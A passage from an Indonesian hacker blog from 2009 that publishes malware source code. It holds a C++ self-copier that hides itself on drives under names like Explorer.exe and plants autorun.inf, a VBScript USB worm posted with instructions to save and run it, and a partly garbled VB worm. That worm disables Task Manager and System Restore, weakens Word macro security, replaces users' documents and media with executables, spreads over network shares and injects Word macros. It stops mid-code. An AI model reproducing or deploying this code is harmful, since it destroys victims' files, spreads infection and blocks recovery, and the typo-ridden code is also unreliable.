    SetFileAttributes("J:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("J:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("J:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("K:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("K:\\")){
case DRIVE_REMOTE:
    CopyFile(main,"K:\\SystemDirectory.exe",false);
    break;
case DRIVE_FIXED:
    CopyFile(main,"K:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("K:\\RECYCLER\\spools",NULL);
    CreateDirectory("K:\\DRMv1PM",NULL);
    CopyFile(main,"K:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("K:\\DRMv1PM.lic","K:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("K:\\DRMv1PM.lic","K:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"K:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"K:\\Explorer.exe",false);
    CopyFile(main,"K:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("K:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("K:\\autorun.inf");
    Filename = "K:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("K:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("K:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("K:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("K:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("K:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("K:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("K:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}

if(CreateDirectory("W:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("W:\\")){
case DRIVE_FIXED:
    CopyFile(main,"W:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("W:\\RECYCLER\\spools",NULL);
    CreateDirectory("W:\\DRMv1PM",NULL);
    CopyFile(main,"W:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("W:\\DRMv1PM.lic","W:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("W:\\DRMv1PM.lic","W:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"W:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"W:\\Explorer.exe",false);
    CopyFile(main,"W:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("W:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("W:\\autorun.inf");
    Filename = "W:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("W:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("W:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("W:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("W:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("W:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("W:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("W:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("X:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("X:\\")){
case DRIVE_REMOTE:
    CopyFile(main,"X:\\Public Directory.exe",false);
    CreateDirectory("X:\\Public Files",NULL);
    CopyFile(main,"X:\\Public Files\\Facebook Proxy.exe",false);
    break;
case DRIVE_FIXED:
    CopyFile(main,"X:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("X:\\RECYCLER\\spools",NULL);
    CreateDirectory("X:\\DRMv1PM",NULL);
    CopyFile(main,"X:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("X:\\DRMv1PM.lic","X:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("X:\\DRMv1PM.lic","X:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"X:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"X:\\Explorer.exe",false);
    CopyFile(main,"X:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("X:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("X:\\autorun.inf");
    Filename = "X:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("X:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("X:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("X:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("X:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("X:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("X:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("X:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;

}
}
if(CreateDirectory("Y:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("Y:\\")){
case DRIVE_REMOTE:
    CopyFile(main,"Y:\\Public Directory.exe",false);
    CreateDirectory("Y:\\Public Files",NULL);
    CopyFile(main,"Y:\\Public Files\\Facebook Proxy.exe",false);
    break;
case DRIVE_FIXED:
    CopyFile(main,"Y:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("Y:\\RECYCLER\\spools",NULL);
    CreateDirectory("Y:\\DRMv1PM",NULL);
    CopyFile(main,"Y:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("Y:\\DRMv1PM.lic","Y:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("Y:\\DRMv1PM.lic","Y:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"Y:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"Y:\\Explorer.exe",false);
    CopyFile(main,"Y:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("Y:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("Y:\\autorun.inf");
    Filename = "Y:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("Y:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Y:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Y:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Y:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Y:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Y:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Y:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;

}
}
if(CreateDirectory("Z:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("Z:\\")){
case DRIVE_REMOTE:
    CopyFile(main,"Z:\\Public Directory.exe",false);
    CreateDirectory("Z:\\Public Files",NULL);
    CopyFile(main,"Z:\\Public Files\\Facebook Proxy.exe",false);
    break;
case DRIVE_FIXED:
    CopyFile(main,"Z:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("Z:\\RECYCLER\\spools",NULL);
    CreateDirectory("Z:\\DRMv1PM",NULL);
    CopyFile(main,"Z:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("Z:\\DRMv1PM.lic","Z:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("Z:\\DRMv1PM.lic","Z:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"Z:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"Z:\\Explorer.exe",false);
    CopyFile(main,"Z:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("Z:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("Z:\\autorun.inf");
    Filename = "Z:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("Z:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Z:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Z:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Z:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Z:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Z:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("Z:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;

}
}
}








--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
K-159
lirva32

And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)
MAAFKAN ATAS SEMUA DOSA DAN SALAHKU
2. Dewi S.
3. W. Devi Amelia
4. S. Anna

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ jatimcrew staff
~ whitecyber staff
~ lumajangcrew staff
~ unix_dbuger, boys_rvn1609, jaqk, byz9991, bius, g4pt3k, anharku, wandi, 5yn_4ck, kiddies, bom2
~ arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, black_samuraixxx, ucrit_penyu, wendys182, cybermuttaqin
~ k3nz0, thomas_ipt2007, blackpaper, nakuragen, candra
~ whitehat, wenkhairu, Agoes_doubleb, diki, lumajangcrew a.k.a adwisatya a.k.a xyberbreaker, wahyu_antijasakom
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
~ All members of Anti-Jasakom
~ All members of whitecyber
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding, #jatimcrew, #antijasakom, #whitecyber
 [Read More...]

Label:

Diposting oleh Shamus di 10:22 PM 0 komentar  

Monday, June 8, 2009

virus shocky by Shamus

This summary is not available. Please click here to view the post. [Read More...]

Label:

Diposting oleh Shamus di 3:06 AM 0 komentar  

Tuesday, June 2, 2009

What do You Think About *.VBS

hey Shamus, kq posting bulan ini banyak kali coding nya sech...?1 [itulah pertanyaan yang di lontarkan oleh sahabat dekat saya yang super..duper genitnya.. ;)]
lagi gila yach ?!
macam mana pula ini...
tak tau lah aku...
tapi ada satu pertanyaan yang mengganjal di hati saya...
apakah ini source virus, karena bisa melakukan "sesuatu" ?!
bah...
tak tau pula lah aku..
yang penting posting di tag "VIRUS"...
hihhiihiii...^^
[sableng mode : ON]

begin code :

######################################
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Andre Susanto"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
######################################

kalo ga mau capek-capek nulis, copy aja code diatas terus save dengan format *.vbs
misalkan ajip-ahh.vbs (pokoknya harus ada vbs nya itu wajib)

buka file ciptaan anda tadi...
daaannnnnn...............
resiko di tanggung penumpang, karena bukan salah ibu mengandung tapi karena salah bapak masuk kamar...
hahhahahahahaha... :P



--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
y3dips
K-159
bius
lirva32
And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)

MAAF ATAS SEMUA DOSA DAN SALAHKU

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ boys_rvn1609, arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, jaqk
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding
 [Read More...]

Label:

Diposting oleh Shamus di 2:19 AM 0 komentar  

"PANIC" !!!!!!!

bukan virus sih...
hanya sebuah teks HTML biasa.
tapi lumayan lah, untuk nakut-nakutin "teman" kita yang "awam".. ;)
let's check out...

begin code :



simpan dengan ekstensi *.HTML [example: BF.HTML]
and.. enjoy it... ;)

--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
y3dips
K-159
bius
lirva32
And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)

MAAF ATAS SEMUA DOSA DAN SALAHKU

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ boys_rvn1609, arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, jaqk
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding

 [Read More...]

Label:

Diposting oleh Shamus di 2:05 AM 0 komentar  

Wednesday, May 6, 2009

Shamus 'n Luvrie Worm

yah...
sebuah script worm sederhana, memakai bahasa pemrograman VB..
inilah janjiku pada bang luvrie...
setelah coding lama, akhirnya jadi juga... :)
special posted for luvrie... ^^

begin :

'===============================================================
'------------------------------------------------------------------------------------------------
' S'nLW: Shamus 'n Luvrie Worm
' (2009) CopyLeft, Shamus, Java, Indonesia
' email: Shamus_octa@linuxmail.org
' For educational purpose only!
'------------------------------------------------------------------------------------------------
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4

Private Declare Function ExitWindowsEx Lib "user32" (ByValdwOptions As Long, ByVal dwReserved As Long) As Long

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

Private Declare Function FindWindow Lib "user32"Alias _ "FindWindowA" (ByVal ipClassName As String, ByVal _ lpWindowName As String) As Long


Dim pict As Picture
Dim a As Integer


Private Declare Function BitBlt _
Lib "gdi32" ( _
ByVal hDestDC As Long, _
ByVal X As Long, ByVal Y As Long, _
ByVal nWidth As Long, -
ByVal nHeight As Long, _
ByValhSrcDC As Long, _
ByVal XSrc As Long, ByVal YSrc As Long, _
ByVal dwRop As Long _
) As Long

Private Declare Function GetDesktopWindow _
Lib "user32" () As Long

Private Declare Function GetDC _
Lib "user32" ( _
ByVal hwnd As Long, _
) As long

Private Declare Function ReleaseDC_
Lib "user32" ( _
ByVal hwnd As Long, _
) As Long

Private Const SWP_NOSIZE = &H1
Private Const SWP_NOMOVE = &H2
Private Const SWP_NOZORDER = &H4
Private Const SWP_NOREDRAW = &H8
Private Const SWP_NOACTIVEVATE = &H10
Private Const SWP_FRAMECHANGED = &H20
Private Const SWP_SHOWWINDOW = &H40
Private Const SWP_HIDEWINDOW = &H80
Private Const SWP_NOCOPYBITS = &H100
Private Const SWP_NOOWNERZODER = &H200
Private Const SWP_DRAWFRAME = SWP_FRAMECHANGED
Private Const SWP_NOREPOSITION = SWP_NOOWNERZORDER
Private Const HWND_TOP = 0
Private Const HWND_BOTTOM = 1
Private Const HWND_TOPMOST = -1
Private Const HWND_NOTOPMOST = -2
Private Declare Funtion SetWindowPos _
Lib "user32" ( _
ByVal hwnd As Long, _
ByVal hwndInsertAfter As Long, _
ByVal X As Long, _
ByVal Y As Long, _
ByVal CX As Long, _
ByVal CY As Long, _
ByVal wFlags As Long _
Private mbOnTop As Boolean

Private Property Let OnTop(Setting As Boolean)
If Setting Then
SetWindowPos hwnd, HWND_TOPMOST, _
0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE
Else
SetWindowPos hwnd, HWND_TOPMOST, _
0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE
End If
MbOnTop = Setting
End Property

Private Property Get OnTop() As Boolean
OnTop = MbOnTOp
End Property

Private Sub Form_Load ()
On Eror Resuma Next

Dim drives
Dim regrun
Dim xx
Dim x
Dim y
Dim z
Dim zz
Dim fso

'---
App. TaskVisible = False

'===
Set regrun = CreateObject("Wscript.shell")
regrun.regwrite
"HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\Run\Stask", "C:\csw.exe"
regrun.regwrite
"HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurentVersion\policies\Explorer\NoFolderOption", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurentVersion\policies\Explorer\NoRun", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINESOFTWARE\Policies\Microsoft\Windows\NT\SystemRestore\DisableConfig\", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINESOFTWARE\Policies\Microsoft\Windows\NT\SystemREstore\DisableSR", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
regrun.regwrite
"HKEY_CURENT_USERSOFTWARE\Microsoft\Windows\CurentVersion\Policies\System\DisableTaskMgr", 1, REG_DWORD"
regrun.regwrite
"HKEY_CURENT_USERSoftware\Microsoft\office\9.0\Word\Security", 1, "REG DWORD"
regrun.regwrite
"HKEY_CURENT_USERSoftware\Microsoft\office\10.0\Word\Security", 1, "REG DWORD"
regrun.regwrite
"HKEY_CURENT_USERSoftware\Microsoft\office\11.0\Word\Security", 1, "REG DWORD"

'=
X = App.Path & "\" & App.EXEName & ".exe"
Y = "c:\WINDOWS\credicardinfo.txt.EXE"
z = "c:\ccinfo.EXE"
zz = "c:\csw.exe"
zzz = "c:\readme.txt"
zzzz = C:\windows\readme.txt"
zzzzz = "c:\windows\system32\readme.txt"
mark = "c:\version.sys"

CopyFile X, Y, 0

'=
If Dir("c:version.sys") = "" Then
Set fso = CreateObject("scripting.filesystemobject")
Set Drives = fso.drives
For Each Drive In drives
If Drive.isready Then
CopyFile X, mark, 0
Dosearch (Drive & "\")
End If
Next
End If

Timer1.Enabled = True
Timer2.Enabled = True
Timer3.Enabled = True
Timer4.Enabled = True
Timer5.Enabled = True
Call NetSpread
Call Main
End Sub

'=
Function Dosearch(path)

On Eror Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set folder = fso.get folder(path)
Set Files = folder.files

For Each file In Files
'=
If LCase(fso.GetExtensionName(file.path)) = "doc" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "sys" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "dll" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "jpg" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "bmp" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "mp3" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "wav" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "rar" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "gif" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "pdf" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "txt" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "3GP" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "mpg" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "htm" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "DAT" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "exe" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "waf" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If
'=
If LCase(fso.GetExtensionName(file.path)) = "avi" Then
Set cop = fso.getfile("c\readme.txt")
cop.Copy (file.path & ".exe")
fso.deletefile (File.Path)
End If

On Error Resume Next

Next

Set NetSpread()

On Eror Resume Next
Set Network = CreateObject(WScript.NetWork")
Set Shares = Network.EnumNetworkDrives

If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy
("kamasutra.txt.exe")
Doserach (SHares.Item(Counter1))
End If
Next
Set fso = Nothing

End If
Set Shares = Nothing
Set Network = Nothing
End Sub

'=
Sub Maain()
On Error Resume Next
Dim zz, zzl, file, fso, oword, nt, b, i, iw, attr
zzl = App.path & "\" & App.EXEName & ".exe"
file = "c:\csw.exe"
file2 = "c:\windows\readme.txt.exe"
file3 = "c:\windows\ccinfo.exe"

CopyFile zzl, file, 0
CopyFile zzl, file2, 0
CopyFile zzl, file3, 0

On Error resume Next
Open "c:\v.reg" FOr Output As 2
Print #2, "REGEDIT4"
Print #2
"[HKEY_CURRENT_USERSoftware\Micosoft\Office9.0\Word\Security]"
Print #2, """Level""=dword:0000001"
Print #2,
"[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\WordSecurity]"
Print #2, """Level""=dword:0000001"
Print #2,
"[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\WordSecurity]"
Print #2, """Level""=dword:0000001"
Close 2
Shell "regedit/s c:\v.reg", vbHide
Kill "c:\v.reg"

On Error Resume Next
Open "c:\vv.reg" For Output As 5
Print #5, "WIndows Registry Editor Version 5.00"
Print #5,
"[HKEY_CURRENT_USER\Software\Microsoft\Office 9.0\Word\Security]"
Print #5, """Level""=dword:0000001
Print #5,
"[HKEY_CURRENT_USER\Software\Microsoft\Office 10.0\Word\Security]"
Print #5, """level""=dword:0000001"
Print #5,
"[HKEY_CURRENT_USER\Software\Microsoft\Office 11.0\Word\Security]"
Print #5, """level""=dword:0000001"
Close 5
Shell "regedit / s c:\vv.reg", vbHide
Kill "c:\vv.reg"

On Error Resume Next.0
If DIr("c:\m3r.sys") <> "m3r.sys" Then
Open "c:\m3r.sys" For Output As 9
Print #9, "Sub document_close()"
Print #9, "On Error Resume Next"
Print #9, "Open ""c:\m3r.txt""For Output As 2"
Print #9, "Print #2, ""sub document_open()"""
Print #9, "Print #2, ""On Error Resume Next"""
Print #9, "Print #2, ""'by M3:Reincarnation"""
Print #9, "Print #2, ""obj =
ActiveDocument.Shapes(1).OLEFFormat.ClassType"""
Print #9, "Print #2, ""With
ActiveDocument.Shapes(1).OLEFormat"""
Print #9, "Print #2, "" .ActivateAs ClassType:=obj"""
Print #9, "Print #2, "" .Activate"""
Print #9, "Print #2, ""End With"""
Print #9, "Print #2, ""end sub"""
Print #9, "Close 2"
Print #9, "Set fso =
ActiveDocument(""Scripting.FileSystemObject"")"
Print #9, "Set nt =
ActiveDocument.VBProject.vbcomponents(!).codemodule"
Print #9, "Set iw = fso.OpenTextFile(""c:\m3r.txt"", 1, True)"
Print #9, "nt.DeleteLines 1, nt.CountOfLines"
Print #9, "i = 1"
Print #9, "Do While iw.atendofstream <> True"
Print #9, "b = iw.readline"
Print #9, "nt.InsertLines i, b"
Print #9, "i = i+ 1"
Print #9, "Loop"
Print #9, "ActiveDocument.Shapes.AddOLEObject_"
Print #9, "FileName:=""c:\csw.exe"", _'
Print #9, "LinkToFile:=False"
Print #9, "ActiveDocument.Save"
Print #9, "Open ""c:\vv.reg"" For Output As 3"
Print #9, "Print #3, ""REGEDIT4"""
Print #9, "Print #3,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Close 3,
